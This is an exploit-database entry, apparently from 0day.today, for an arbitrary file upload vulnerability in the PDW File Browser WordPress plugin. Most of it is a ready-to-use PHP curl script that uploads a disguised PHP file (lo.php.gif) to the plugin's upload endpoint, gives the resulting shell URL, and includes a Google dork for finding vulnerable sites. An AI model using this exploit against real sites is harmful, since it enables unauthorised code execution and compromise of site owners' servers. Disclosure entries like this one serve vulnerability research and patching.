id: 18486
date: 06/07/2012
title: Wordpress Plugins PDW File Browser Arbitrary File Upload Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - PDW File Browser Arbitrary File Upload Vulnerability
# Version : 1.1
# Link : http://wordpress.org/extend/plugins/pdw-file-browser/
# Plugins : http://downloads.wordpress.org/plugin/pdw-file-browser.zip
# Google Dork : inurl:/wp-content/plugins/pdw-file-browser/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/pdw-file-browser/pdw_file_browser/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('Filedata'=>"@$uploadfile",
              'uploadpath'=>'/wordpress/wp-content/plugins/pdw-file-browser/pdw_file_browser/swfupload/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/pdw-file-browser/pdw_file_browser/swfupload/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>



#  0day.today [2023-03-24]  #